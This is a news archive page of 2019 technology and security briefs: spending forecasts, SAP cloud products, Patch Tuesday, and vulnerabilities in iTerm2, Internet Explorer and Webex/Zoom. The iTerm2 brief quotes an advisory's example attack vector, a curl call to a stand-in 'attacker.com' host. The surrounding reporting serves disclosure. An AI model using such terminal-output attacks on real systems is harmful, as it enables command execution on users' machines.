Category Archives: Software

Spending on security hardware, software, and services continues to increase

Worldwide spending on security products and services will enjoy solid growth over the next five years as organizations continue to invest in solutions to meet a wide range of security threats and requirements. According to an updated forecast from the IDC, worldwide spending on security-related hardware, software, and services will be $106.6 billion in 2019, an increase of 10.7% over 2018. This amount will reach $151.2 billion in 2023 with a compound annual growth rate … More

The post Spending on security hardware, software, and services continues to increase appeared first on Help Net Security.

SAP HANA Cloud Services has Canada written all over it

BARCELONA — SAP’s new cloud data storage products were formally revealed at its TechEd conference last week, and despite a round of layoffs announced earlier this year across its Canadian operations, Canada’s research hubs in Vancouver and Waterloo remain an integral part of SAP’s latest portfolio enhancements, executives told IT World Canada.

SAP’s chief technology officer Juergen Mueller, took to the stage during his opening keynote on the heels of the company’s other TechEd event in Las Vegas, and explained how the company plans to make it easier for businesses to develop applications across its Business Technology Platform. Front and centre is SAP HANA Cloud Services, which combines all of SAP’s data and analytics capabilities as one set of interconnected services to store, process, govern and consume large volumes of data.

“We are becoming much more business-centric,” Mueller told audience members, acknowledging the fact that there was less of a focus on demonstrations with running code on the keynote stage. “SAP HANA Cloud offers one data access layer for all your data sources. It directly connects to your data from your on-premise HANA system, your third-party systems, and even Excel, without the need for data replication in order to work with that data.”

SAP HANA Cloud can be managed on the SAP Cloud platform using Kubernetes, and will significantly lower customers’ total cost of ownership for storing and managing petabytes worth of data, added Mueller. The company’s research hub in Vancouver has been hard at work for the past five years separating compute and storage with SAP HANA Cloud, ultimately allowing customers to scale both independently.

The expo floor at SAP TechEd in Barcelona. Photo by SAP.

“Vancouver is at the cutting edge of our machine learning and predictive analytics developments. They’re taking machine learning technology, and not thinking about just improving the product but thinking about how to connect it to people and the way they do work,” said Gerrit Kazmaier, SAP’s executive vice-president for analytics, databases, and data management, who spoke with IT World Canada after the morning keynotes.

SAP also unveiled the SAP Data Warehouse Cloud, a cloud-based repository under the SAP HANA Cloud umbrella, which according to Kazmaier, will help customers store petabytes worth of data without worrying about pesky capacity limitations. SAP’s other research hub in Waterloo was largely responsible for laying the groundwork for the repository.

As a result, customers will be able to put their newest or most valuable data in HANA’s in-memory repository and as the data is used less frequently, or “cools”, move it to HANA’s disk storage mode. Customers can eventually move that data to HANA’s new data lake, which is more cost-effective, once the heavy analytics is applied to it. And when data cools even further, they can move it to external data lakes, such as AWS S3 and Azure Data Lake all from within the SAP HANA Cloud.

Neil McGovern, senior director of product marketing for SAP, likened the company’s cloud strategy to the way people store photos on the public cloud.

“It’s the same idea. We’re just doing it with business data,” he explained, adding even C-Suite executives, who have been slow to fully grasp the value SAP can bring to the table due to the complexities around its products and the technology powering them, know the flexibility cloud can provide.

McGovern indicated that if a CIO today demands $25 million for a data centre during a boardroom meeting, there’s almost only one response.

“They’ll look at you and say ‘Go through the cloud instead’, and ‘Why are you employed with us?’”

General availability for SAP HANA Cloud and SAP Data Warehouse Cloud is planned for the fourth quarter of 2019.

Bill McDermott steps down as CEO of SAP

After 10 years as the CEO of SAP SE, Bill McDermott has decided not to renew his contract and will be relinquishing his position. McDermott will be replaced by SAP executive boards members Jennifer Morgan and Christian Klein in a co-chief executive officer structure – as per the company’s long term succession plan – while…

DevSecOps role expansion has changed how companies address their security posture

While organizations shift their applications to microservices environments, the responsibility for securing these environments shifts as well, Radware reveals. The rapid expansion of the Development Security Operations (DevSecOps) role has changed how companies address their security posture with approximately 70% of survey respondents stating that the CISO was not the top influencer in deciding on security software policy, tools and or implementation. This shift has likely exposed companies to a broader range of security risks … More

The post DevSecOps role expansion has changed how companies address their security posture appeared first on Help Net Security.

Critical command execution vulnerability in iTerm2 patched, upgrade ASAP!

A critical vulnerability (CVE-2019-9535) in iTerm2, a macOS terminal emulator frequently used by developers and system administrators, could allow attackers to take control of a target system. “An attacker who can produce output to the terminal can, in many cases, execute commands on the user’s computer,” Mozilla explained. “Example attack vectors for this would be connecting to an attacker-controlled SSH server or commands like curl http://attacker.com and tail -f /var/log/apache2/referer_log. We expect the community will … More

The post Critical command execution vulnerability in iTerm2 patched, upgrade ASAP! appeared first on Help Net Security.

Microsoft introduces several new capabilities to Office 365 and Surface devices

In order to make work and play more intuitive and natural than before, Microsoft has brought about innovations in voice, digital ink, and touch across Office 365.  In addition to announcing several new devices at its Surface event, Oct. 2, 2019, aimed at making modern work more intuitive and natural for everyone, Microsoft also shared…

Digital transformation requires an aggressive approach to security

Organizations agree, building security into digital transformation initiatives is a priority, yet the recommended path to progress is unclear, according to a survey conducted by ZeroNorth. Companies of all sizes and in all industries are experiencing the pains of digital transformation, with 79% of survey respondents indicating their organization already has related initiatives underway. All participants indicate the importance of digital transformation to the future of their organization, even those who have not yet embarked … More

The post Digital transformation requires an aggressive approach to security appeared first on Help Net Security.

Adobe to deactivate all user accounts in Venezuela

To comply with an executive order issued by the U.S. government, Adobe is deactivating all accounts in Venezuela. The computer software company will no longer be providing users access to services and software, including free ones, or allowing users to make any new transactions or purchases. 

October 2019 Patch Tuesday forecast: Be sure to apply service stack updates

School is back in session across most of the world, and here in the United States most students look forward to a school holiday called ‘fall break.’ While we never have a Patch Tuesday off, this may actually be a bit of fall break for most us because I don’t anticipate many updates this month. Before we get into the forecast details, I’d like to provide some information around service stack updates (SSUs) and how … More

The post October 2019 Patch Tuesday forecast: Be sure to apply service stack updates appeared first on Help Net Security.

Microsoft will continue providing Windows 7 security updates for SMBs

According to the latest Alert Logic’s research, most devices in small and midsize businesses (SMBs) run Windows versions that are expired or are about to expire soon. Luckily for SMBs that don’t want or can’t upgrade from Windows 7, Microsoft has decided to provide extended security updates (ESU) through January 2023 – if they are willing to pay for them, of course. Details about the ESU offer Windows is the most popular desktop operating system … More

The post Microsoft will continue providing Windows 7 security updates for SMBs appeared first on Help Net Security.

Vulnerability in Cisco Webex and Zoom may expose online meetings to snooping

Cequence Security’s CQ Prime Threat Research Team discovered of a vulnerability in Cisco Webex and Zoom video conferencing platforms that potentially allows an attacker to enumerate or list and view active meetings that are not protected. The web conferencing market includes nearly three dozen vendors, some of whom may use similar meeting identification techniques. Although the CQ Prime team did not test each of these products, it is possible they could be susceptible as well. … More

The post Vulnerability in Cisco Webex and Zoom may expose online meetings to snooping appeared first on Help Net Security.

Windows 10 1903 on ARM Gets a Virtualization-based Security Feature

Windows 10 version 1903 on ARM has gotten an additional virtualization-based security feature that creates secured regions of memory that are isolated from the operating system. These secured and isolated regions of memory can then be used by security solutions so that they are better protected from vulnerabilities in the operating s [...]

Microsoft drops emergency Internet Explorer fix for actively exploited zero-day

Microsoft has unexpectedly released out-of-band security updates to fix vulnerabilities in Internet Explorer and Microsoft Defender. The IE zero-day bug is deemed “critical”, as it’s being actively exploited to achieve partial or complete control of a vulnerable systems. The Internet Explorer vulnerability (CVE-2019-1367) CVE-2019-1367 is a memory corruption vulnerability in the scripting engine that could be exploited to achieve remote code execution. An attacker who successfully exploited the vulnerability could gain the same user rights … More

The post Microsoft drops emergency Internet Explorer fix for actively exploited zero-day appeared first on Help Net Security.

$5 trillion threat of cyber attacks spur investments in solutions, talent and tech

IT & Business Services M&A Market’s disclosed deal value reached a whopping $97 billion in 1H 2019 – the highest total on record for a six-month period, according to Hampleton Partners. There has also been a significant rise in valuations, with overall median disclosed deal amount reaching $43 million in 1H 2019, up from $23 million in 2H 2018. Deal volume lessened, with 370 transactions inked compared to 432 in 2H 2018. However, trailing 30-month … More

The post $5 trillion threat of cyber attacks spur investments in solutions, talent and tech appeared first on Help Net Security.

What security and privacy enhancements has iOS 13 brought?

With the release of iPhone 11 and its two Pro variants, Apple has released iOS 13, a substantial functional update of its popular mobile operating system. But while many users are happy to finally get a complete Dark Mode for the device or a better phone camera, some are more interested in security and privacy enhancements. Location data On iOS 13, users will be able to control the location data shared with apps with more … More

The post What security and privacy enhancements has iOS 13 brought? appeared first on Help Net Security.

Disclosing vulnerabilities to improve software security is good for everyone

Today, software companies and security researchers are near universal in their belief that disclosing vulnerabilities to improve software security is good for everyone, according to a Veracode report. 451 Research conducted survey from December 2018 to January 2019 using a representative sample of 1,000 respondents across a range of industries and organization sizes in the US, Germany, France, Italy and the UK. Survey respondents reported enterprise roles such as application development, infrastructure and information security, … More

The post Disclosing vulnerabilities to improve software security is good for everyone appeared first on Help Net Security.

Product showcase: NetLib Security Encryptionizer

NetLib Security has spent the past 20+ years developing a powerful, patented solution that starts by setting up a defense for any organization wherever your data resides: physical, virtual and cloud. Our platform is geared to simplify the process for you while ensuring unprecedented levels of security are in place. NetLib Security encryption solutions do not require specialized skill sets, programming changes, or administrative overhead; we simplify your data security needs with an affordable solution … More

The post Product showcase: NetLib Security Encryptionizer appeared first on Help Net Security.

The use of open source software in DevOps has become strategic for organizations of all sizes

A higher percentage of top performing teams in enterprise organizations are using open source software, according to a survey conducted by DevOps Research and Assessment (DORA) and Google Cloud. Additionally, the proportion of Elite performers (highest performing teams) nearly tripled from last year, showing that DevOps capabilities are driving performance. These findings reflect organizations’ increased willingness to embrace investments in technology to deliver value and the use of open source – even in highly regulated, … More

The post The use of open source software in DevOps has become strategic for organizations of all sizes appeared first on Help Net Security.

BotSlayer tool can detect coordinated disinformation campaigns in real time

A new tool in the fight against online disinformation has been launched, called BotSlayer, developed by the Indiana University’s Observatory on Social Media. The software, which is free and open to the public, scans social media in real time to detect evidence of automated Twitter accounts – or bots – pushing messages in a coordinated manner, an increasingly common practice to manipulate public opinion by creating the false impression that many people are talking about … More

The post BotSlayer tool can detect coordinated disinformation campaigns in real time appeared first on Help Net Security.

Sandboxie becomes freeware, soon-to-be open source

Sophos plans to open source Sandboxie, a relatively popular Windows utility that allows users to run applications in a sandbox. Until that happens, they’ve made the utility free. About Sandboxie Sandboxie creates a virtual container in which untrusted programs can be run or installed so that they can’t maliciously modify the underlying OS or data on the host machine. If can make the use of apps such as browsers, email programs, IM clients, Office suites, … More

The post Sandboxie becomes freeware, soon-to-be open source appeared first on Help Net Security.